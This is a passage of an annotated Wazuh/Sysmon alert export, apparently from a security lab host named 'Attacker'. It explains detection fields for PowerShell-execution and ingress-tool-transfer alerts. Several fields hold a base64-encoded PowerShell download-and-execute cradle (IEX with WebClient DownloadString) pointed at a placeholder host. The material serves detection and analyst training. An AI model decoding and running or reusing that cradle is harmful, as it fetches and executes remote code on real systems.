Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:48.8881088Z
Time the record was written to the Windows event log (UTC). Sits between Sysmon's UtcTime and the Wazuh timestamp.

data.win.system.eventRecordID:  351005
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the record, not the process under investigation; see data.win.eventdata.processId for that.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in; this is where to pull surrounding records with wevtutil or Event Viewer.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch means a renamed host or a misregistered agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:47.245 ProcessGuid: {94294ddc-c1af-680a-080d-000000000e00} ProcessId: 11220 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00} ParentProcessId: 10312 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:47.245
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1af-680a-080d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1aa-680a-060d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10312
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:51.778+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:51.778+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  139
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535411.2920607
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:49.1622433Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351006
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:49.119 ProcessGuid: {94294ddc-c1af-680a-080d-000000000e00} ProcessId: 11220 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_i2msvjaf.2l2.ps1 CreationUtcTime: 2025-04-24 22:56:49.119 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:49.119
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1af-680a-080d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_i2msvjaf.2l2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:49.119
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:55.894+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:55.894+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  136
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535415.2923376
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:53.3837111Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351029
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:50.440 ProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} ProcessId: 9788 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1af-680a-080d-000000000e00} ParentProcessId: 11220 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:50.440
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1b2-680a-0a0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9788
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1af-680a-080d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:55.920+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:55.920+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  140
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535415.2931443
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:53.6583905Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351030
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:53.627 ProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} ProcessId: 9788 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gep4ex1m.bat.ps1 CreationUtcTime: 2025-04-24 22:56:53.627 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:53.627
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1b2-680a-0a0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9788
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gep4ex1m.bat.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:53.627
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:58.800+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:58.800+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  137
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535418.2934208
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:56.7879399Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351054
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
